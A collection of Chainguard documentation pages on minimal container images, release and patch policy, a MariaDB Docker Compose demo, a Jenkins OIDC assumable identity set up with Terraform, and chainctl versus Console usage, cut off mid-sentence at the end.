It has very little in it, just sort of the minimum you need to run a typical Linux application. So it has TLS certificates so you can talk to web applications over TLS. It has Unix directories like /tmp and /home, and it doesn’t have a lot else. It’s only a few megabytes in size, but contains a few more things than, say, scratch that you need for typical applications. OK, what we’re going to do here is I’m going to copy from the previous build to the Dockerfile up here. I’m going to copy the hello executable, which is at /work/hello, to /hello. Now, this says copy from builder, so I’ll need to name this first step builder. And that will build this hello executable and copy it into my production image. And then my entry point is now /hello. So there is one more thing we need to do. The static image does not include any libraries like Glibc or anything. It just has enough for running statically compiled binaries. So we need to tell Go to produce a statically compiled binary that contains everything it needs to run and doesn’t rely on system libraries. And we can do that by saying cgo enabled equals zero. In some cases, you might find you need to pass a few more flags, depending on which Go libraries you use. And I’ll link a blog in the notes that explains when you need to do this and what you need to do. But in this case, CGO_ENABLED=0 will allow us to build our static binary. So I think that’s all I need to do. We’ll see if I got it right. Let’s find the Docker build step. I’m going to call this distroless. So when you create an image with just the bare minimum in it to run your application, we quite often call it a distroless image; it doesn’t even have a shell or a package manager. OK, let’s see. Let’s see if that builds. Yep, that built. Excellent. I think I still have the old one running. So let’s get rid of the old web app. No, I always get that wrong. OK, and let’s run this one. I call it web-app-distroless. I hope so. That’s running. Let’s see if it works. Excellent. So this application still works exactly the same as it did at the start of this video. But if I take a look at the web app distroless, the big difference is that now it’s only 8.5 megabytes in size. So we went from the original Golang image, which is 892 megabytes, to a Chainguard Container, which was 775 megabytes, down to 8.51 megabytes. And it still all works the same. So that’s a big saving in terms of space. It also means it’s a lot quicker to transfer about. It’s a lot quicker to start up on your nodes, etc. And most importantly, it should still have zero CVEs. Yes. If you don’t have access to Docker Scout quick view, you can use other scanners, of course. There’s things like Snyk and Grype; Grype is a great free one that we use quite a lot at Chainguard. But that’s really all I want to talk about. So please do go and try out our static images. They do work great with Go, but also they work with Rust, C, etc. And we also have variants that include things like the Glibc libraries, if you just need a very minimal image with Glibc and nothing else to run your application. OK, please try it out and let me know how you get on.
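For reference, here is a minimal sketch of the multi-stage Dockerfile described in the video, written as a shell heredoc so you can paste it into a terminal; the /work/hello path follows the transcript, while the output name and copy source are assumptions you should adjust for your own project.

```sh
cat > Dockerfile <<'EOF'
# Build stage: the Chainguard Go image provides the Go toolchain.
FROM cgr.dev/chainguard/go AS builder
WORKDIR /work
COPY . .
# CGO_ENABLED=0 produces a statically linked binary that can run on the static image.
RUN CGO_ENABLED=0 go build -o hello .

# Final stage: the distroless static image holds only the compiled binary.
FROM cgr.dev/chainguard/static
COPY --from=builder /work/hello /hello
ENTRYPOINT ["/hello"]
EOF

docker build -t go-web-app-distroless .
```

After the build finishes, rerunning docker images and your scanner of choice should show the kind of size and CVE improvements discussed above.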
Relevant Resources Using the static Chainguard Container (Video) Choosing a Container for your Compiled Programs (Article) Getting Started with the Go Chainguard Container (Article) --- ### Chainguard Containers Product Release Lifecycle URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/versions/ Last Modified: December 17, 2024 Tags: Chainguard Containers, Product Chainguard Containers are able to offer few-to-zero known vulnerabilities because they are updated frequently. Because of this continuous release cycle, the best way to mitigate vulnerabilities is to use the newest build of each Chainguard Container available. Chainguard keeps Containers up to date by doing one or more of the following: Applying new releases from upstream projects Rapidly applying upstream patches to current releases — you can read more about this in our blog post, “How Chainguard fixes vulnerabilities before they’re detected” Applying Chainguard patches to OSS software Upstream projects are updated frequently for many reasons, including to combat CVEs, and Chainguard ensures that the most up-to-date software is available in all Chainguard Containers. Additionally, Chainguard often identifies CVEs and other issues before scanners can detect them, so Chainguard may offer a patch to a vulnerable dependency to support Chainguard Containers with few-to-zero vulnerabilities. The best way to mitigate vulnerabilities is to continually update to the latest patched releases of software, but testing and updating can take time and effort. To support flexibility and user choice, Chainguard aims to offer multiple versions of a Chainguard Container that provide the lowest number of vulnerabilities realistically possible. This document provides an overview of Chainguard’s approach to updates, releases, and versions within Chainguard Containers. For more specific guidance, please contact us. Open Source Release Tracks In order to understand how Chainguard releases Chainguard Containers, it’s first important to understand how different open source projects version and release software. This is because Chainguard Containers are built on open source software. There are generally two open source approaches: multiple releases across different versions, or a single release track. In rare cases, open source projects don’t follow a release pattern at all. Multiple Releases Maintained by a Given Open Source Project Popular open source projects often provide maintenance for a number of release tracks concurrently. For example, Java, Go, Postgres, and Kubernetes patch multiple release versions, each on their own defined maintenance schedule. For these types of projects, Chainguard will maintain every version track of the upstream software that receives updates from the project. Single Release Track Maintained by a Given Open Source Project Many open source projects support only a single stream of releases that are continuously incremented; often, this is simply the latest release. In the case of a single release track, any security fix that is published will only be applied to the most recent release of the project, and the project release tags will be updated to indicate a new version is available. For this type of project, Chainguard only warrants that the latest release of the software and its corresponding version tags have the most up-to-date patches available.
What Chainguard Supports and Maintains for Chainguard Containers There are several scenarios that define what Chainguard agrees to maintain regarding software versions in the Chainguard Containers Directory. All container images that Chainguard currently supports are those with upstream software that is still supported and maintained, and Chainguard patches and rebuilds these Containers daily. If you have purchased a container image during its lifecycle that is no longer being supported upstream, you will still be able to access this Container, but Chainguard will not be patching or rebuilding this Container and it will start to accrue CVEs. It is recommended to upgrade to an actively maintained version. The table provides some example scenarios to help illustrate our approach.

| Category | Example | Maintained Upstream Releases | Chainguard Patches | Chainguard No Longer Patches |
|---|---|---|---|---|
| Multiple Release Tracks | Go | 1.23, 1.22 | :latest, 1, 1.23, 1.22 | 1.23.old, 1.22.old, 1.21 and below |
| Multiple Release Tracks | Python | 3.13, 3.12, 3.11, 3.10, 3.9 | :latest, 3, 3.9 and above | 3.8 and below, 3.8.old, 3.9.old, 3.10.old, 3.11.old, 3.12.old |
| Multiple Release Tracks | Postgres | 17, 16, 15, 14, 13 | :latest, 17, 16, 15, 14, 13 | 12 (EOL November 21, 2024) and below |
| Single Release Track | Cosign | 2 | :latest, 2, 2.4 | 2.3, 2.2, 2.1, 2.0, 1.x, 0.x |
| Single Release Track | Bank-Vaults | 1 | :latest, 1 | Any previous version tag |
| No Release Track | envoyproxy/ratelimit | No versioned releases | :latest | Any previous version tag |

Note: The “Maintained Upstream Releases” column is current as of December 2024. What Chainguard Container Versions to Expect When you use freely-available Chainguard Starter Containers, you will have access to the :latest version of any Container available to the public. In some cases, you will also have access to the :latest-dev version, which includes a shell and package manager. For example, the Python container image has both cgr.dev/chainguard/python:latest and cgr.dev/chainguard/python:latest-dev. Many of the programming languages have these options available, including the Java JDK and JRE containers, PHP, Go, Node, Ruby, and Rust. If you are using our enterprise Chainguard Production Containers, you will have access to more versions. The Chainguard approach is as follows: For multiple-release track projects, you will have access to major and minor versions that are actively maintained. For single-release track projects, you will receive the :latest tag as well as every versioned tag that is released over time. Chainguard Patches and Maintenance For multiple release software projects with release schedules clearly published, Chainguard will maintain every currently supported version of the software that is maintained by the upstream project. In other words, Chainguard will apply every patch that is available to every maintained version of the upstream software. For single release track software projects, Chainguard will maintain only the :latest version of the software by applying patches and incrementing the version tag when a new patch is released. Actively maintained Chainguard Containers are rebuilt on a daily cadence, so you can be sure the container image you are using is up to date. A note about -r tags In some cases, Chainguard will fix vulnerabilities in tools without waiting for the external project to release patches. As an example, say there’s a CVE in Go 1.21.3 and the Go team is uncharacteristically slow releasing a fix. In this case, Chainguard could patch a fix into 1.21.3, and release it as 1.21.3-r2.
Chainguard would continue to make the original package available in an image tagged as 1.21.3-r1. If Chainguard had to apply further patches to Go 1.21.3, it would tag these later patched container images with -r3, -r4, and so on. We call this the epoch number. We may take steps like this in order to patch vulnerabilities, remove unnecessary bloat, rebuild the same source with newer tools, or to address bugs in our build configs and build tooling. Bear in mind that Chainguard’s Containers, although minimal, will almost always contain more than one package. At the time of writing this, the Go image has more than 60 distinct packages in it, such as bash, busybox, git, glibc, make, and zlib. When we fix a vulnerability in bash, for example, we likewise ensure that fix gets rolled out to every container image that includes bash, including the go:1.21.3 image. The image tagged 1.21.3-r2 will pull in that bash fix, and fixes for any of the other packages in the image. Put simply, when you opt in to pulling go:1.21.3-r2, you’re opting in to a consistent version of Go, and potentially floating versions of all the other packages. This means you get CVE fixes as well as patch, minor, and even major version releases of bash and every other package the image contains. You can learn more about our approach by reviewing our blog on image tagging philosophy. Wolfi Packages in Chainguard Containers Chainguard Containers only contain packages that are either built and maintained internally by Chainguard or packages from the Wolfi Project. These packages follow the same conventions of minimalism and rapid updates as Chainguard Containers. Starting in March of 2024, Chainguard will maintain one version of each Wolfi package at a time. These will track the latest version of the upstream software in the package. Chainguard will end patch support for previous versions of packages in Wolfi. Existing packages will not be removed from Wolfi and you may continue to use them, but be aware that older packages will no longer be updated and will accrue vulnerabilities over time. The tools we use to build packages and container images remain freely available and open source in Wolfi. This change ensures that Chainguard can provide the most up-to-date patches to all packages for our Containers customers. Note that specific package versions can be made available in Production Containers. If you have a request for a specific package version, please contact support. SLAs A vulnerability and patch service-level agreement (SLA) is available for Chainguard Production Containers. There are no SLAs available for Chainguard’s free tier of container images, but you will have access to frequently updated and patched container images with low-to-zero CVEs. If you are a Chainguard Production Containers user, Chainguard vulnerability and patch SLAs apply only to supported and maintained versions of upstream projects as clearly published by the upstream projects or published container images that can be rebuilt using updated compilers and/or libraries. In the case of single-release track projects, this means that the Chainguard vulnerability and patch SLAs apply only to the latest version and corresponding version tags of the upstream projects. Containers that use open source applications that have reached their end of life are no longer patched.
End of Life and End of Support Software When an open source application version is no longer maintained by the upstream project or has otherwise met its end of life (EOL), Chainguard will generally no longer provide patches to that software. While the Chainguard Production Containers organization directory will continue to have previously purchased container images available, new builds will no longer be published and vulnerabilities are expected to accumulate in those Containers over time. It is recommended to move to an up-to-date, actively maintained version. For software applications that maintain multiple concurrent release tracks, Chainguard will endeavor to provide reasonable notice when a particular software release version is expected to reach EOL status and thus no longer be updated. No EOL notice will be provided for single-release applications where the only supported release is the :latest or corresponding version tag. EOL Grace Period There are cases where an organization may want to continue using a container image after it has reached end-of-life. This could be because an image reaches EOL before the organization’s release schedule, or perhaps later image versions have one or more issues that prevent the organization from upgrading. To help in situations like this, Chainguard offers an end-of-life grace period for eligible Containers, allowing customers access to new builds of container images whose primary package has entered its end-of-life phase for up to six months after they have reached EOL. Refer to our overview of the EOL Grace Period for more information. --- ### Getting Started with the MariaDB Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/mariadb/ Last Modified: September 22, 2023 Tags: Chainguard Containers, Product The MariaDB Container, based on Wolfi and maintained by Chainguard, provides a distroless container image that is suitable for building and running MariaDB workloads. Because Chainguard Containers (including the MariaDB container image) are rebuilt daily with the latest sources and include the absolute minimum of dependencies, they have significantly fewer vulnerabilities than equivalent container images, typically zero. This means you can use the Chainguard MariaDB Container to run MariaDB databases in containerized environments with a smaller footprint and greater security. In order to illustrate how the MariaDB Chainguard Container might be used in practice, this tutorial involves setting up an example PHP application that uses a MariaDB database. This guide assumes you have Docker installed to run the demo; specifically, the procedure outlined in this guide uses Docker Compose to manage the environment on your local machine. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi.
Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Step 1: Setting up a demo application This step involves downloading the demo application code to your local machine. To ensure that the application files don’t remain on your system, navigate to a temporary directory like /tmp/. cd /tmp/ Your system will automatically delete the /tmp/ directory’s contents the next time it shuts down or reboots. The code that comprises this demo application is hosted in a public GitHub repository managed by Chainguard. Pull down the example application files from GitHub with the following command. git clone --sparse https://github.com/chainguard-dev/edu-images-demos.git Because this guide’s demo application code is stored in a repository with other examples, we don’t need to pull down every file from this repository. For this reason, this command includes the --sparse option. This will initialize a sparse-checkout file, causing the working directory to contain only the files in the root of the repository until the sparse-checkout configuration is modified. Navigate into this new directory and list its contents to confirm this. cd edu-images-demos/ && ls For now, this directory will only contain the repository’s LICENSE and README files. LICENSE README.md To retrieve the files you need for this tutorial’s sample application, run the following git command. git sparse-checkout set mariadb This modifies the sparse-checkout configuration initialized in the previous git clone command so that the checkout only consists of the repo’s mariadb directory. Navigate into this new directory. cd mariadb/ From here, you can run the application and use a web browser to observe it working in real time, which we’ll do in the next section. Step 2: Inspect, run, and test the sample application We encourage you to check out the application code on GitHub to better understand how this application works, but we’ll provide a brief overview here. This demo creates a LEMP (Linux, (E)NGINX, MariaDB and PHP-FPM) environment based on Wolfi Chainguard Containers. We will use Docker Compose to bring up the environment, which will spin up three containers: an app container, a mariadb container, and an nginx container. These will run as services. Once the environment is up, you can visit the demo in your web browser. The index.php file contains code that does the following: Connects to the MariaDB server running in the mariadb container Creates a new table named data if it doesn’t already exist Inserts a new entry into the table with a random number Queries the table to show all the entries Every time you reload the page, a new entry will be added to the table. Execute the following command to create and start each of the three containers and bring up the application. docker compose up -d The -d option is short for --detach; this will cause the containers to run in the background, allowing you to continue using the same terminal window. If you run into permissions issues when running this command, try running it again with sudo privileges. Note: If at any point you’d like to stop and remove these containers, run docker compose down. Once all the containers have started, you’ll be able to visit the application and observe it working. Open up your preferred web browser and navigate to localhost:8000. There, you’ll be presented with text like the following. Every time you refresh your browser, a new entry will appear.
This shows that the application is recording each visit in the MariaDB database and that the application is working correctly. After confirming that the application is functioning as expected, you can read through the next section to explore how else you can work with the mariadb container. Step 3: Working with the database The docker-compose.yml file contains some configuration details regarding the MariaDB database used in this example application. Run the following command to inspect the contents of this file. cat docker-compose.yml We’re interested in the mariadb service: . . . mariadb: image: cgr.dev/chainguard/mariadb restart: unless-stopped environment: MARIADB_ALLOW_EMPTY_ROOT_PASSWORD: 1 MARIADB_USER: php MARIADB_PASSWORD: password MARIADB_DATABASE: php-test ports: - 3306:3306 volumes: - ./:/app networks: - wolfi . . . This section defines a few environment variables relating to the database used in the example application. Importantly, they specify that the application database runs under a user named php with the password “password”. Using this information, you can connect to the database running in the container as the php user with a command like the following. docker exec -it mariadb-mariadb-1 mariadb --user php -p docker exec allows you to execute commands within a running container. The -i argument allows you to execute an interactive command while the -t option allocates a pseudo-TTY to the process within the container. Because our goal is to access the sample database through the mariadb command line client, these options are necessary. Next, enter the name of the container running the MariaDB database; by default, this will be named mariadb-mariadb-1. Following that, the remainder of this command represents the command that will be run within the container. Here, we run the mariadb command to access the database, specifying that we want to connect as the php user. The final -p option indicates that we want to be prompted to enter the password. Enter password: Enter the password and you’ll then be presented with the MariaDB command line SQL shell. Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 3 Server version: 10.11.4-MariaDB MariaDB Server Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> From here, you can interact with the database from within the mariadb-mariadb-1 container as you would with any other MariaDB database. For example, you could update existing tables, create new ones, and insert or delete data. To close the MariaDB prompt, you can enter the following command. \q Of course, you likely won’t be regularly managing your containerized databases over the command line. The purpose of this section is only to show that you can interact with the database running in this container just like you would with any other MariaDB database. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose MariaDB Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk, you need to use the USER root directive.
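As a hedged illustration of that note, the following sketch installs an extra package on top of an assumed -dev variant of the MariaDB image; the tag, the package name, and the user it switches back to are placeholders you should adapt to your project.

```sh
cat > Dockerfile <<'EOF'
# -dev variants of Chainguard images include apk and a shell; distroless variants do not.
FROM cgr.dev/chainguard/mariadb:latest-dev
# The image runs as a non-root user, so switch to root before installing packages.
USER root
# curl is only an example package; install whatever your project actually needs.
RUN apk add --no-cache curl
# Switch back to a non-root user for runtime (check your image's configuration for
# the correct user name or UID before relying on this placeholder value).
USER 65532
EOF
```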
If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as the base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Create an Assumable Identity for a Jenkins Pipeline URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/jenkins-identity/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines how to create an identity using Terraform, and then how to update a Jenkins pipeline so that it can assume the identity and interact with Chainguard resources. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. A Jenkins server with the OpenID Connect Provider plugin installed and configured, as well as a pipeline you can use to test out the identity you’ll create. Creating Terraform Files We will be using Terraform to create an identity for a Jenkins pipeline to assume. This step outlines how to create three Terraform configuration files that, together, will produce such an identity. To help explain each configuration file’s purpose, we will go over what they do and how to create each file one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/jenkins-id && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. To create the main.tf file, run the following command. cat > main.tf <<EOF terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } EOF Next, you can create the sample.tf file. sample.tf sample.tf will create a couple of structures that will help us test out the identity in a workflow. This Terraform configuration consists of two main parts. The first part of the file will contain the following lines. data "chainguard_group" "group" { name = "my-customer.biz" } This section looks up a Chainguard IAM organization named my-customer.biz. This organization will contain the identity — which will be created by the jenkins.tf file — that we will access when we test it out later on. Now you can move on to creating the last of our Terraform configuration files, jenkins.tf. jenkins.tf The jenkins.tf file is what will actually create the identity for your Jenkins workflow to assume.
The file will consist of four sections, which we’ll go over one by one. The first section creates the identity itself. resource "chainguard_identity" "jenkins" { parent_id = data.chainguard_group.group.id name = "jenkins" description = <<EOF This is an identity that authorizes Jenkins workflows for this repository to assume to interact with chainctl. EOF claim_match { audience = "%your-audience%" issuer = "https://%your-domain%/oidc" subject = "%your-subject%" } } First, this section creates a Chainguard Identity tied to the Chainguard organization looked up in the sample.tf file. The identity is named jenkins and has a brief description. The most important part of this section is the claim_match. When the Jenkins workflow tries to assume this identity later on, it must present a token matching the audience, issuer and subject specified here in order to do so. The audience is the intended recipient of the issued token, while the issuer is the entity that creates the token. Finally, the subject is the entity (here, the Jenkins pipeline build) that the token represents. The audience and issuer fields use settings from your configured Jenkins OIDC credential. You can find these by clicking Manage Jenkins in the left-hand sidebar menu of your dashboard, then clicking Credentials. Click on your System credentials, then click Global credentials (unrestricted). This will take you to a table listing all your configured OIDC tokens. Click the wrench icon for the token you want to use to test this identity. This will take you to a screen similar to the following screenshot showing the audience and issuer values you should use in your jenkins.tf file. For the subject, refer to your Jenkins OIDC claim settings. You can find these by navigating back to the Manage Jenkins landing page in your dashboard and clicking on Security. From there, scroll to the OpenID Connect section on the page, click on the Claim templates button, and locate the sub field. The subject value you should use will be the value in the Value format field under the first sub template. In the following example, the value to use is jenkins-oidc-test. For the purposes of this guide, you will need to replace %your-audience%, %your-domain%, and %your-subject% with the values from your Jenkins OIDC credential page and the OpenID Connect administrative settings page. The next section will output the new identity’s id value. This is a unique value that represents the identity itself. output "jenkins-identity" { value = chainguard_identity.jenkins.id } The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.jenkins.id group = data.chainguard_group.group.id role = data.chainguard_role.viewer.items[0].id } Following that, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan If the plan worked successfully and you’re satisfied that it will produce the resources you expect, you can apply it.
terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. . . . Plan: 4 to add, 0 to change, 0 to destroy. Changes to Outputs: + jenkins-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After pressing ENTER, the command will complete and will output a jenkins-identity value. . . . Apply complete! Resources: 3 added, 0 changed, 0 destroyed. Outputs: jenkins-identity = "<your jenkins identity>" This is the identity’s UIDP (unique identity path), which you configured the jenkins.tf file to emit in the previous section. Note this value down, as you’ll need it when you test this identity using a Jenkins workflow. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls Note that you may receive a PermissionDenied error part way through the apply step. If so, run chainctl auth login once more, and then terraform apply again to resume creating the identity and resources. You’re now ready to create or edit a Jenkins pipeline to test out this identity. Testing the identity with a Jenkins pipeline To test the identity you created with Terraform in the previous section, create or edit a pipeline job. To create a pipeline job, click the New Item link in the menu at the top left of your Jenkins dashboard. Give the job a title, and select Pipeline from the list of job types. Once you are on the pipeline configuration page, click the This project is parameterized check box. Give your parameter a name like oidc-token and, under the Credential type selection list, select OpenID Connect id token. Mark the parameter as required, and select your configured OIDC credential token as the Default Value for the parameter per the following screenshot. Next, copy the following pipeline definition into the Script body for your job: pipeline { agent any stages { stage('oidc-test') { steps { withCredentials([string(variable: 'token', credentialsId: 'oidc-token')]) { sh ''' wget -O chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_linux_\$(uname -m)" chmod +x chainctl ./chainctl auth login --identity-token $token --identity <your jenkins identity> ./chainctl auth configure-docker --identity-token $token --identity <your jenkins identity> ''' } } } } } The important line is the withCredentials option, which maps the generated OIDC token from the oidc-token credential parameter to the token variable in the pipeline step. Now you can add commands for testing the identity, using chainctl images repos list as in the following example: sh ''' wget -O chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_linux_\$(uname -m)" chmod +x chainctl ./chainctl auth login --identity-token $token --identity <your jenkins identity> ./chainctl auth configure-docker --identity-token $token --identity <your jenkins identity> ./chainctl images repos list docker pull cgr.dev/<organization>/<repo>:<tag> ''' Save the job, and then build it using the Build with Parameters option. Assuming everything works as expected, your pipeline will be able to assume the identity and run the chainctl images repos list command, listing repositories available to the organization. . . .
chainctl 100%[===================>] 54.34M 6.78MB/s in 13s 2023-05-17 13:19:45 (4.28 MB/s) - ‘chainctl’ saved [56983552/56983552] Successfully exchanged token. Valid! Id: 3f4ad8a9d5e63be71d631a359ba0a91dcade94ab/d3ed9c70b538a796 <list of repos> If you’d like to experiment further with this identity and what the pipeline can do with it, there are a few parts of this setup that you can tweak. For instance, if you’d like to give this identity different permissions you can change the role data source to the role you would like to grant. data "chainguard_role" "editor" { name = "editor" } You can also edit the pipeline itself to change its behavior. For example, instead of listing the repositories the identity has access to, you could have the workflow list the organizations it belongs to. . . . - './chainctl iam organizations ls' Of course, the Jenkins pipeline will only be able to perform certain actions on certain resources, depending on what kind of access you grant it. Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the role-binding and the identity created in this guide. It will not delete the organization. You can then remove the working directory to clean up your system. rm -r ~/jenkins-id/ Following that, all of the example resources created in this guide will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices, which you can refer to if you’d like to build on this Terraform configuration for a production environment. Likewise, for more information on using OIDC with Jenkins pipelines, we encourage you to check out the OpenID Connect Provider documentation. --- ### Compare chainctl usage with the Chainguard Console URL: https://edu.chainguard.dev/chainguard/chainctl-usage/comparing-chainctl-to-console/ Last Modified: January 1, 0001 Tags: Chainguard Control, chainctl, Chainguard Console, Product When should I use the Chainguard Console? When is it better to use chainctl? This page gives some guidance on the benefits of each method for managing your Chainguard Containers to help you make that decision. Prerequisites To access the Chainguard Console you need to create an account and sign in. The Console is accessible to everyone, including users who aren’t Chainguard customers. To use chainctl, start by installing chainctl. See Get Started with chainctl to help you begin using it; the examples on this page assume you have chainctl installed and are authenticated. High-level Comparison The Console is especially useful for one-off information searches, such as when you don’t know precisely what you want to know. The Console provides detailed information, but may require a few clicks to home in on precisely what you are looking for. You can perform useful container-related query tasks from within the Console, as this page will demonstrate with some examples. If you know specifically what you are looking for or what you want to accomplish, chainctl is a powerful way to do so. It can perform some additional tasks that are not yet available in the Console, such as comparing images with a diff. This guide will take the reader through a few use cases to illustrate. 
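As an example of a chainctl-only task, the image diff mentioned above can be run roughly as follows. This is a hedged sketch rather than a full walkthrough: the image references are placeholders, and the exact arguments and output format are covered in the comparison guide linked at the end of this page.

```sh
# Hypothetical sketch: compare two image references with chainctl.
# Replace the placeholders with images your organization has access to.
chainctl images diff \
  cgr.dev/$ORGANIZATION/python:latest \
  cgr.dev/$ORGANIZATION/python:latest-dev
```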
Find Available Images Find Available Images in the Console To find the images available to you in the Console, do this: Open the Console. On the Overview page that opens, click Organization Images in the sidebar. Find Available Images with chainctl To find the images available to you using chainctl, use this command. The list of available images is likely to be long and will scroll past you quickly in the terminal, so it may be more useful to pipe the output into a grep search or redirect it into a file. chainctl images list Invite Users Invite Users in the Console To invite a user using the Console, follow these steps: Open the Console. On the Overview page that opens, click the Manage pull tokens tab, just below the search box. On the Settings page that opens, click Users in the sidebar. Click Invite users. Enter the Email address of the user you are inviting and use the dropdown menu to assign a Role for this user. Click Invite. Invite Users using chainctl To invite a user using chainctl, use this command, substituting your organization name for ORGANIZATION along with setting the role, email address, length of time for the invite to be valid, and whether this invite may only be used once: chainctl iam invite create ORGANIZATION --role=viewer --email=sample@organization.dev --ttl=7d --single-use Review Container Image History Review Container Image History in the Console To examine the history of an image using the Console: Open the Console and find the image you want to examine more closely. Do this by clicking on an image in the Recent Changes list on this page or clicking View all organization images to see the full list and find the image you want. On the image page you start on the Tags tab and see a list of tags which correspond to the release version of the image, like this one for kubectl. This list contains columns with data about each image release, like the Pull URL, Digest, and when it was last changed. Click the other tabs to learn more about the latest release version of this image. Review Container Image History using chainctl To examine the history of an image using chainctl, enter this, replacing ORGANIZATION with your organization: chainctl image history kubectl:latest --parent=ORGANIZATION This will return a reverse-chronological history of when a specific tag was updated to point to a new manifest digest. This list can be long. Here’s an excerpt: - time: 2025-05-29 03:08:31 UTC digest: sha256:34798f562dffc3746cb69bab49b93ff83aa57bea393a07997e87c37bc83a62db architectures: amd64: sha256:a71ccfdc86cd73d395d3528ce3f8df1f4dd132b73ff03016b0ec42da23d4ec99 (18.13 MB) arm64: sha256:2876b0c3de431f0d7df8f888a0d40bb0c8259c47109f978237d305e7818b704b (16.43 MB) - time: 2025-05-28 17:19:58 UTC digest: sha256:1f798940981573c34e1d11c8b6d266f18d06e95b81251d6880f511d55b833cfd - time: 2025-05-27 19:53:02 UTC digest: sha256:81095db3adc00495fceb064e86dfd81c7ffdf081c55daf6b12be6ef1605bd18c architectures: amd64: sha256:56db73a4b66ad326a7858ca4157ded2d3b6d11ff1030cfbdf3a3bd879a5a5725 (18.13 MB) arm64: sha256:280160c9c422d7526169812cf89401043096f5d4ff385d1b59f3610109486aed (16.43 MB) - time: 2025-05-23 01:09:22 UTC digest: sha256:c0934fc335d8b24923487cb7d0b673490bd393fd4b6cd20f6f0e156a7481ffc7 architectures: amd64: sha256:46e11b8beed94d93272e5a87753f9f43f02f5f1b9d83d8ba279eeb18c114c863 (18.13 MB) arm64: sha256:b288bc13da78aa7b2a82d50dbca45ed2fe286f0f1f248fa2e12604ef9a109f33 (16.40 MB) ... 
The details that are returned here and the details found in the Console vary in focus, but where the same details are provided they should match. See Examine the History of Container Images for more information about this command. Learn more To learn more about chainctl, see: chainctl Usage chainctl Reference To learn more about the Chainguard Console, see: Using the Chainguard Directory and Console. Compare a Chainguard Container to a non-Chainguard Alternative in the Console This is a feature unique to the Console and is described in detail in Using CVE Visualizations. Compare Two Chainguard Containers With chainctl This is a feature unique to chainctl and is described in detail in How To Compare Chainguard Containers with chainctl. --- ### Understanding Chainguard's Container Image Categories URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/images-categories/ Last Modified: April 3, 2025 Tags: Chainguard Containers, Product Chainguard Containers are a collection of curated, distroless container images designed with a focus on software supply chain security. Chainguard’s container images are designed to be slim runtimes for production environments, emphasizing security and efficiency by removing unnecessary elements. Additionally, the images are designed to be easily integrated into existing workflows, helping organizations to build better, more secure software. Within the Chainguard Containers Directory, Chainguard Containers are organized into five general categories (with some falling into multiple categories): Starter Base Application FIPS AI This conceptual article will outline each of these categories in turn, including their uses as well as examples of images from each category. It will also highlight important considerations one should make when using images from these categories. Starter Containers Chainguard offers a set of container images that are publicly available and don’t require authentication for download and use; they are free to use for everyone. We refer to these as our Starter Containers, and they cover several use cases for different language ecosystems. Starter Containers are limited to the latest build of a given image, and are always tagged as latest and latest-dev. You can access these images directly from Chainguard’s registry from the chainguard repository. For example, to download the cURL Starter image, you could run a command like the following: docker pull cgr.dev/chainguard/curl To access any other image, you will need to do so through your organization’s private Chainguard repository. The following example will pull the chainguard-base image from the chainguard.edu organization’s repository: docker pull cgr.dev/chainguard.edu/chainguard-base Note that you won’t have access to the organization’s repository used in this example, but if your organization has access to the chainguard-base image you will be able to pull this image using your organization’s repository name in place of chainguard.edu. Chainguard’s registry provides public access to all Starter images, and provides customer access for Production images after logging in and authenticating. For a complete list of Starter images that are currently available, check out the Starter category on Chainguard Containers Directory. Registered users can also access all Starter and available Production images in the 